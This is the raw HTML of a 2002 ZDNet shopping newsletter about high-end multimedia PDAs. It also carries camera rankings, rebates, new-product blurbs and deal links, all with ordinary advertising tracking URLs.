 &lt;a href="http://clickthru.online.com/Click?q=fc-WpHmQVwTauRU4pZa9-0t3VVat9yR" target="new"&gt;   
 &lt;img src="http://www.techrepublic.com/images/ads/Toshiba.sky.2400freebag_160x600.gif" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;
 &lt;!-- /ad --&gt;&lt;!-- rebates --&gt;
 &lt;br&gt;&lt;img src="http://www.cnet.com/i/nl/zd-ba/rebates.gif" width=160 height=18 alt="Rebates"&gt;&lt;br&gt;
 &lt;table width=160 bgcolor="#eeeeee" cellpadding=5 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-2"&gt;When ordering, make sure the reseller/manufacturer 
 provides the rebate coupon you need.
 &lt;br&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-2"&gt;Expires July 31, 2002&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=11-l8riI2-aPLZhppqX3VynhNBuCqlR" &gt;Get a car cassette adapter and power adapter FREE with Rio Volt SP250&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-2"&gt;Expires August 31, 2002&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI14RundZFSkMRUVolYrBeR" &gt;$20 off SideWinder Strategic Commander&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-2"&gt;Expires September 30, 2002&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=3c-tK4RIcIw_GwZ-o1Y0VXXjhrHNHyR" &gt;$20 off Rio 600 64MB&lt;/a&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJWhgT2xbBJlh9GpMUHM3FR" &gt;$20 off Nike PSA (120)&lt;/a&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=66-kDH_IyWzTR_oSqmsPj9y-DzbW-9R" &gt;$20 off RioVolt SP90&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;&lt;font face="arial, helvetica" size="-2"&gt;Expires March 3, 2003&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=7b-prT_IBZzgRkymTxbDr4q1O7VpJcR" &gt;$10 off Microsoft Natural Keyboard Pro PS2/USB&lt;/a&gt;&lt;br&gt;
 &lt;br&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;!-- top 5 --&gt;&lt;IMG 
       height=18 alt="ZDNet Top 5 Products" src="http://www.cnet.com/i/sh/nl/top5.gif" 
       width=160&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=2 cellPadding=0 width=160 bgColor=#eeeeee border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD colSpan=4&gt;&lt;!--&lt;IMG height=3 src="http://www.cnet.com/i/sh/nl/b.gif" 
             width=1&gt;&lt;BR&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&amp;nbsp; &lt;IMG alt="" 
             src="e50520011112_files/rhc_digitalcameras.gif" border=0&gt;--&gt; &lt;b&gt;&lt;FONT face="arial, helvetica" size=-1&gt;Digital Cameras&lt;/font&gt;&lt;/b&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD rowSpan=5&gt;&amp;nbsp;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=15&gt;&lt;FONT face="arial, helvetica" 
           size=-1&gt;&lt;B&gt;1.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
  &lt;a href="http://clickthru.online.com/Click?q=90-wHZMQ_IMRhNOiekVb8HYULuonXiR" &gt;&lt;B&gt;PowerShot G2&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;FONT color=#333333 size=-2&gt;Premier merchant:&lt;BR&gt;
 		&lt;a href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZFS_MhrGLsIC1b2OB8OEPR" &gt;PC Connection $799&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD rowSpan=5&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;2.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=ba-m-45QXpJTWS-ckfxhOmI_uIUEknR" &gt;&lt;B&gt;PowerShot S30&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;FONT color=#333333 size=-2&gt;Premier 
             merchant:&lt;BR&gt;&lt;a href="http://clickthru.online.com/Click?q=cf-ebM-QLw1uw1KdThJaylIO7r3fxeR" &gt;PC Connection $499&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;3.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=e4-ABYFQVkP4jD75LjI81u0PT_Qv1yR" &gt;&lt;B&gt;PowerShot S40&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;FONT color=#333333 size=-2&gt;Premier merchant:&lt;BR&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=fa-FmqNQhO1bO0ZZqstvDA4oSMpoLnR" &gt;CDW $599&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;4.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=0f-RM2lIqjD91PMkvesUb9HGRJ1bfeR" &gt;&lt;B&gt;PowerShot A40&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;!--&lt;FONT color=#333333 
             size=-2&gt;Premier merchant:&lt;BR&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=24-8DdMIczi7pYqCqCgeUef92iqrwyR" &gt;CDW $499&lt;/A&gt;&lt;BR&gt;--&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;5.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=39-7QgMIjIiVpfFTUVCGLs-y39w-_lR" &gt;&lt;B&gt;Cyber Shot DSC-F707&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;FONT color=#333333 
             size=-2&gt;Premier merchant:&lt;BR&gt;&lt;a href="http://clickthru.online.com/Click?q=4e-0Y95InZ3aFwu66zIKlsTn8N_Jj9R" &gt;Gateway $445&lt;/A&gt; &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD colSpan=3&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=63-tPKjIHWGwVTjVf_g_9-hwkp_WEcR" &gt;More Top 
             Selling Products...&lt;/A&gt;&lt;/B&gt;&lt;/B&gt;&lt;BR&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
     &lt;TD vAlign=bottom width=12 colSpan=3&gt;&lt;IMG height=6 
       src="http://www.cnet.com/i/sh/nl/gl_corner2.gif" width=12&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;!-- intro --&gt;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width=428 bgColor=#ffffff&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=428 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD width=10&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=10&gt;&lt;/TD&gt;
           &lt;TD width=410&gt;&lt;BR&gt;
             &lt;TABLE cellSpacing=0 cellPadding=0 width=410 border=0&gt;
               &lt;TBODY&gt;
               &lt;TR vAlign=top&gt;
                 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;FONT color=#333333 
                   size=2&gt;&lt;B&gt;Dear Reader,&lt;BR&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;
 Basic electronic organizers they're not, but if you're searching 
 for a pocket-sized computer for music, movies, and games, then 
 these PDAs are well worth a look. All four models feature fast 
 processors, large amounts of RAM, and sharp, color screens, which 
 make them better choices for rich media than competing products. 
 But beyond those basics, these handhelds are very different. You'll 
 find three different operating systems: Pocket PC, Palm, and Linux. 
 Two have keyboards, one has a built-in Bluetooth radio, and all 
 four support various expansion card formats. Most Pocket PCs are 
 multimedia friendly; we've picked two that really stand out because 
 of features or price. However, none of these are inexpensive models, 
 so check out our hands-on reviews to find the high-end handheld 
 that you'll be happiest with. 
 &lt;P&gt;
 &lt;table&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://zdnetshopper.cnet.com/i/co/ps/120/8751975_120_1.gif"&gt;
 		&lt;/TD&gt;
 		&lt;TD&gt;&lt;FONT color=#990000 size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=78-d5asIdUkHpvIL5i5vnMUN5xspoRR" &gt;&lt;B&gt;Audiovox Maestro PDA-1032&lt;/b&gt;&lt;/a&gt;
 &lt;LI&gt;Lowest price: $330
 		&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://zdnetshopper.cnet.com/i/co/ps/120/7344382_120_1.gif"&gt;
 		&lt;/TD&gt;
 		&lt;TD&gt;&lt;FONT color=#990000 size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=8d-nbL1Q7nmvy6HOUkIiSupcptbPMPR" &gt;&lt;B&gt;Compaq iPaq H3870&lt;/b&gt;&lt;/a&gt;
 &lt;LI&gt;Lowest price: $545
 	&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://zdnetshopper.cnet.com/i/co/ps/120/8407129_120_1.gif"&gt;
 		&lt;/TD&gt;
 		&lt;TD&gt;
 &lt;FONT color=#990000 size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a2-6-M7QXZHFgN_bAI9R0CGk_HtsonR" &gt;&lt;B&gt;Sharp Zaurus SL-5500&lt;/b&gt;&lt;/a&gt;
 &lt;li&gt;Lowest price: $367
 	&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://zdnetshopper.cnet.com/i/co/ps/120/9062023_120_1.gif"&gt;
 		&lt;/TD&gt;
 		&lt;TD&gt;&lt;FONT color=#990000 size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b8-smr2QQUsXVL_HIolq9S_p8qkEiiR" &gt;&lt;B&gt;Sony CLIE PEG-NR70V&lt;/b&gt;&lt;/a&gt;
 &lt;LI&gt;Lowest price: $517
 &lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;/table&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
           &lt;TD width=8&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
         width=8&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- new products--&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=420 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD colSpan=3&gt;&lt;IMG height=30 alt="Feature: New Products" 
             src="http://www.cnet.com/i/sh/nl/sub_new.gif" width=395&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=100&gt;&lt;a href="http://clickthru.online.com/Click?q=cd-VHhSQzsJFTDFtiDFjAi_TOlRfXPR" &gt;&lt;IMG height=100 src="http://www.zdnet.com/products/graphics/pid/561861.jpg" width=130 border=0&gt;&lt;/A&gt;&lt;/TD&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=300&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=e2-J1OpQhyI69x7KDbENBEZdihv9KnR" &gt;&lt;B&gt;Sony CLIE PEG-T665C&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;With the CLIE PEG-T665C, Sony took everything good about the 
 PEG-T615C--including its terrific color screen and solid 
 design--and added a faster processor and MP3 support to make 
 quite an attractive Palm OS PDA.&lt;BR&gt;&lt;a href="http://clickthru.online.com/Click?q=f7-N0QnQLgImYMFjfjlrZIGiR6ImOeR" &gt;&lt;FONT 
             color=#990000 size=-2&gt;Read Review&lt;/FONT&gt;&lt;/A&gt; &lt;FONT color=#990000 
             size=-2&gt;|&lt;/FONT&gt; &lt;a href="http://clickthru.online.com/Click?q=0c-_Y3DIc8xF7xrJahWDjP2qJ13b4yR" &gt;&lt;FONT color=#990000 size=-2&gt;Check Prices&lt;/FONT&gt;&lt;/A&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD colSpan=4&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=100&gt;&lt;a href="http://clickthru.online.com/Click?q=21-UPROIjdkyuROSf-oQqYoj1cTQ4lR" &gt;&lt;IMG height=100 hspace=10 src="http://www.zdnet.com/products/graphics/pid/561145.jpg" width=130 
             border=0&gt;&lt;/A&gt;&lt;/TD&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=300&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=36-wg7-IiIamXDQeEtMxvH3QainXQ4R" &gt;&lt;B&gt;TDK Electronics MOJO 620&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;If you're the type who really likes to categorize and catalog 
 your music, this MP3 CD player has everything that you need, 
 plus a few never-before-seen extras.&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=4b-k_l7IBUWWWf-AstP9VA35c54JMcR" &gt;&lt;FONT 
             color=#990000 size=-2&gt;Read Review&lt;/FONT&gt;&lt;/A&gt; &lt;FONT color=#990000 
             size=-2&gt;|&lt;/FONT&gt; &lt;a href="http://clickthru.online.com/Click?q=60-oqItIsE3hT060YOLN8S_eSgFWVRR" &gt;&lt;FONT color=#990000 size=-2&gt;Check Prices&lt;/FONT&gt;&lt;/A&gt; 
       &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- ad --&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=395 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=10&gt;&lt;/TD&gt;
           &lt;TD width=385 bgColor=#c0c0c0&gt;&lt;IMG height=1 
             src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;FONT 
       face="arial, helvetica" size=-1&gt;&lt;BR&gt;&lt;/FONT&gt;
       &lt;CENTER&gt;&lt;IMG height=10 alt=Advertisement 
       src="http://www.cnet.com/i/sh/nl/ad10-dk.gif" width=120&gt;&lt;/CENTER&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD colSpan=3&gt;&lt;IMG height=5 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD colSpan=3&gt;&lt;IMG height=5 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR vAlign=center&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD align=right width=75&gt;&lt;IMG alt="" hspace=15 
             src="http://www.cnet.com/i/sh/nl/5455_zdnet_image.jpg" align=middle 
           order="0"&gt;&lt;br&gt;&lt;br&gt;&lt;/TD&gt;
 		  &lt;TD vAlign=top width=300&gt;&lt;FONT face="verdana, helvetica" 
             size=-2&gt;&lt;BR&gt;
 &lt;a href="http://clickthru.online.com/Click?q=76-vJf7InBWAWiI7Tc1okYP2r70U69R" &gt;FREE PDA or Printer with select systems!&lt;/A&gt;&lt;br&gt;
 Buy select Dell systems and choose a Palm PDA or an Epson printer 
 FREE (shipping extra), PLUS save up to $300! Limited time offer. 
 Small Business only. Click for details.&lt;br&gt;&lt;/td&gt;
   &lt;TR vAlign=center&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD align=right width=75&gt;&lt;IMG alt="" hspace=15 
             src="http://www.cnet.com/i/sh/nl/84x74_systems.gif" align=middle 
           order="0"&gt;&lt;br&gt;&lt;br&gt;&lt;/TD&gt;
 		  &lt;TD vAlign=top width=300&gt;&lt;FONT face="verdana, helvetica" 
             size=-2&gt;&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=8b-SBGBQY0VloNH6YvEYIEElDh4B1rR" &gt;A friendly reminder from Dell Home Systems&lt;/A&gt;&lt;br&gt;Buy a select new Dell Home System and get your Memory Upgraded 
 for free. Hurry! Offer ends soon.&lt;br&gt;&lt;/td&gt; 		  
 &lt;!--&lt;tr valign=middle&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td width=75 align=right&gt;&lt;img src="http://www.cnet.com/i/sh/nl/hp_inks2.jpg" width="98" height="82" border="0" hspace="20" align="bottom" alt=""&gt;&lt;/td&gt;
 &lt;td width=300 height="50" valign="top"&gt;&lt;font face="verdana, helvetica" size="-2"&gt;&lt;BR&gt;
 Canon inkjet cartridges start at $2.00!&lt;BR&gt;
 Epson inkjet cartridges start at $4.00!&lt;BR&gt;
 HP inkjet cartridges start at $15.00!&lt;BR&gt;
 Toners start at just $17.00!&lt;BR&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a0-11h8QQB7cN5ksDRUByjw2PB1s7iR" &gt;http://www.voltexx.com&lt;/a&gt;
 &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;--&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- steals and deals --&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=420 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=410&gt;&lt;IMG height=30 alt="Steals and Deals" 
             src="http://www.cnet.com/i/sh/nl/sub_steals.gif" width=395&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;FONT size=-2&gt;Please note 
             that prices fluctuate and may have changed since the sending of this 
             newsletter. Lowest prices listed are usually after rebates (but 
             please check with the reseller, sometimes the rebate is included in 
             their price). &lt;BR&gt;&lt;/FONT&gt;
             &lt;P&gt;&lt;B&gt;Handspring Treo 270&lt;/B&gt;&lt;BR&gt;Price recently dropped 29%&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=b5-50FcQ7Uq5NZWZfP1PHq15ZNEEZPR" &gt;
 			Lowest price: $499&lt;/A&gt; 
             &lt;P&gt;&lt;B&gt;HP PhotoSmart 912XI&lt;/B&gt;&lt;BR&gt;Price recently dropped 40%&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=ca-iciuQUgTC1LryhXcl8jfOfRHHUnR" &gt;
 			Lowest price: $299&lt;/A&gt;&lt;BR&gt;
             &lt;P&gt;&lt;B&gt;JVC XV-S502SL&lt;/B&gt;&lt;BR&gt;Price recently dropped 45%&lt;br&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=df-1kJhQLETx263W9ofbQq-Kh1XhaeR" &gt;
 			Lowest price: $137&lt;font face="Arial"&gt;&lt;/A&gt; &lt;BR&gt;&lt;br&gt;
 			&lt;BR&gt;&lt;BR&gt;&lt;U&gt;&lt;B&gt;SPECIAL FEATURE&lt;/B&gt;&lt;/U&gt;&lt;BR&gt;&lt;br&gt;Did you know that ChannelOnline's StoreSite enables you to set up
 a private storefront with your company name and logo in less than
 an hour?
 &lt;P&gt;
 Your customers can view quotes you have created for them, search 
 the product database, build their own quotes based on the pricing 
 you've predetermined for them, and place orders with you online, 24/7.
 &lt;P&gt;
 Sign up now to give your customers a whole new level of service.
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f4-Y-XEQ0sDS-fS1K7uUJ5QddfWmTyR" &gt;&lt;B&gt;Tell me more about ChannelOnline.&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/FONT&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;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width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- Thin grey line --&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR vAlign=top&gt;
     &lt;TD width=1 bgColor=#83A3CB rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD width=10 bgColor=#1E5C99 rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=10&gt;&lt;/TD&gt;
     &lt;TD width=1 bgColor=#000000 rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD width=3 bgColor=#ffffff rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=2&gt;&lt;/TD&gt;
     &lt;TD width=582 bgColor=#ffffff&gt;&lt;IMG height=5 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=1&gt;&lt;/TD&gt;
     &lt;TD width=3 bgColor=#ffffff rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=2&gt;&lt;/TD&gt;
     &lt;TD width=1 bgColor=#000000 rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD width=10 bgColor=#1E5C99 rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=10&gt;&lt;/TD&gt;
     &lt;TD width=1 bgColor=#83A3CB rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 border=0&gt;
   &lt;TBODY&gt;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width=12 bgColor=#ffffff&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=12&gt;&lt;/TD&gt;
     &lt;TD width=564 bgColor=#ffffff&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;BR&gt;
 &lt;!--Elsewhere --&gt;
       &lt;FONT face="arial, helvetica" color=#990000 size=+1&gt;&lt;B&gt;Elsewhere on ZDNet&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1 src="http://www.zdnet.com/b.gif" 
             width=1 NOSEND="1"&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD&gt;&lt;IMG height=4 src="http://www.zdnet.com/b.gif" width=1 
             NOSEND="1"&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=0a-ZnKCIrrwX4l83l0Bwhq6GOxuYznR" &gt;Need a memory upgrade? Find out with CNET's Memory Configurator.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1f-rvwqI58sviD65-M1xmYgHobjqmeR" &gt;Clearance Center: Get discounts on PCs, PDAs, MP3 players and more!&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=34-pJpSIcdj2djGrhb3_tvVyn4IcgyR" &gt;Find out the top 10 Web services security requirements at Tech Update.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=49-ZM4cIEpGf40_0zqVX4RVXFO5JSFR" &gt;Builder.com shows you how to bring Java to the masses with Cold Fusion MX.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=5e-ssGdIn0i96uLdPZhsnStcVTQzc9R" &gt;Check out thousands of IT job listings in ZDNet's Career Center.&lt;/A&gt;
 &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD width=12 bgColor=#ffffff&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=12&gt;&lt;/TD&gt;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
 &lt;!-- footer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href="http://clickthru.online.com/Click?q=73-__ZeIBB9P5R_943T8UEE0WNrUZcR" &gt;free newsletters&lt;/a&gt; from ZDNet&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width="1" height="5"&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@spamassassin.taint.org&lt;p&gt;
 &lt;a NOTRACK href='http://clickthru.online.com/Click?q=88-ecHPrWKdiq2DGhz6rUOtj0Q9UDlaDsRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=9d-kkCWQv0hotrEmsiuKLvd75wKZzPR" &gt;Change e-mail format&lt;/a&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=b3-QHzxQYKF7rfPqn4AE64qDAwrPGrR" &gt;Change e-mail address&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=c8-2lPnQWOIMbAGiyxMKE-nFr99H2iR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=dd-tpm0QzWMAbfmlgmGZP85eXsJh-PR" &gt;Advertise&lt;/a&gt;&lt;br&gt;&lt;/font&gt;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href="http://clickthru.online.com/Click?q=f2-OZVTQUwPRr5GgQ10pvVdi5Z7ednR" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
